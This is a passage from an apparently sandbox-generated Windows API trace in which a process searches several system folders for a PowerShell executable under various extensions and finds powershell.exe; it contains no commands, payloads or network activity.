	[0648.199] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.199] SetErrorMode (uMode=0x1) returned 0x1
	[0648.199] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.199] SetErrorMode (uMode=0x1) returned 0x1
	[0648.199] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.199] SetErrorMode (uMode=0x1) returned 0x1
	[0648.200] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.200] SetErrorMode (uMode=0x1) returned 0x1
	[0648.200] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.200] SetErrorMode (uMode=0x1) returned 0x1
	[0648.200] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.200] SetErrorMode (uMode=0x1) returned 0x1
	[0648.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.201] SetErrorMode (uMode=0x1) returned 0x1
	[0648.201] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.204] SetErrorMode (uMode=0x1) returned 0x1
	[0648.204] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.204] SetErrorMode (uMode=0x1) returned 0x1
	[0648.205] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.205] SetErrorMode (uMode=0x1) returned 0x1
	[0648.205] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.205] SetErrorMode (uMode=0x1) returned 0x1
	[0648.205] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.206] SetErrorMode (uMode=0x1) returned 0x1
	[0648.206] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.206] SetErrorMode (uMode=0x1) returned 0x1
	[0648.206] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.206] SetErrorMode (uMode=0x1) returned 0x1
	[0648.207] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0648.207] SetErrorMode (uMode=0x1) returned 0x1
	[0648.207] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.207] SetErrorMode (uMode=0x1) returned 0x1
	[0648.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.207] SetErrorMode (uMode=0x1) returned 0x1
	[0648.208] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.208] SetErrorMode (uMode=0x1) returned 0x1
	[0648.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.208] SetErrorMode (uMode=0x1) returned 0x1
	[0648.208] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.208] SetErrorMode (uMode=0x1) returned 0x1
	[0648.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.209] SetErrorMode (uMode=0x1) returned 0x1
	[0648.209] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.209] SetErrorMode (uMode=0x1) returned 0x1
	[0648.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.209] SetErrorMode (uMode=0x1) returned 0x1
	[0648.210] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.210] SetErrorMode (uMode=0x1) returned 0x1
	[0648.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.210] SetErrorMode (uMode=0x1) returned 0x1
	[0648.210] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.211] SetErrorMode (uMode=0x1) returned 0x1
	[0648.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.211] SetErrorMode (uMode=0x1) returned 0x1
	[0648.211] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.211] SetErrorMode (uMode=0x1) returned 0x1
	[0648.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.211] SetErrorMode (uMode=0x1) returned 0x1
	[0648.212] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.212] SetErrorMode (uMode=0x1) returned 0x1
	[0648.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.212] SetErrorMode (uMode=0x1) returned 0x1
	[0648.212] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.213] SetErrorMode (uMode=0x1) returned 0x1
	[0648.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.213] SetErrorMode (uMode=0x1) returned 0x1
	[0648.213] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.213] SetErrorMode (uMode=0x1) returned 0x1
	[0648.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.214] SetErrorMode (uMode=0x1) returned 0x1
	[0648.214] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.215] SetErrorMode (uMode=0x1) returned 0x1
	[0648.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.215] SetErrorMode (uMode=0x1) returned 0x1
	[0648.216] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.216] SetErrorMode (uMode=0x1) returned 0x1
	[0648.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.216] SetErrorMode (uMode=0x1) returned 0x1
	[0648.216] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.216] SetErrorMode (uMode=0x1) returned 0x1
	[0648.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.217] SetErrorMode (uMode=0x1) returned 0x1
	[0648.217] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.217] SetErrorMode (uMode=0x1) returned 0x1
	[0648.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.217] SetErrorMode (uMode=0x1) returned 0x1
	[0648.217] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.218] SetErrorMode (uMode=0x1) returned 0x1
	[0648.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0648.218] SetErrorMode (uMode=0x1) returned 0x1
	[0648.218] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.218] SetErrorMode (uMode=0x1) returned 0x1
	[0648.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0648.219] SetErrorMode (uMode=0x1) returned 0x1
	[0648.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.219] SetErrorMode (uMode=0x1) returned 0x1
	[0648.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0648.219] SetErrorMode (uMode=0x1) returned 0x1
	[0648.219] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.220] SetErrorMode (uMode=0x1) returned 0x1
	[0648.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0648.220] SetErrorMode (uMode=0x1) returned 0x1
	[0648.220] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.220] SetErrorMode (uMode=0x1) returned 0x1
	[0648.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0648.221] SetErrorMode (uMode=0x1) returned 0x1
	[0648.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0648.221] SetErrorMode (uMode=0x1) returned 0x1
	[0648.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0648.221] SetErrorMode (uMode=0x1) returned 0x1
	[0648.221] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84d940 | out: lpFindFileData=0x1c84d940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b9a03b0
	[0648.222] FindNextFileW (in: hFindFile=0x1b9a03b0, lpFindFileData=0x1c84d950 | out: lpFindFileData=0x1c84d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0648.223] FindClose (in: hFindFile=0x1b9a03b0 | out: hFindFile=0x1b9a03b0) returned 1
	[0648.223] SetErrorMode (uMode=0x1) returned 0x1
	[0648.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c84da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0648.224] SetErrorMode (uMode=0x1) returned 0x1
	[0648.224] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c84dc70 | out: lpFileInformation=0x1c84dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0648.224] SetErrorMode (uMode=0x1) returned 0x1
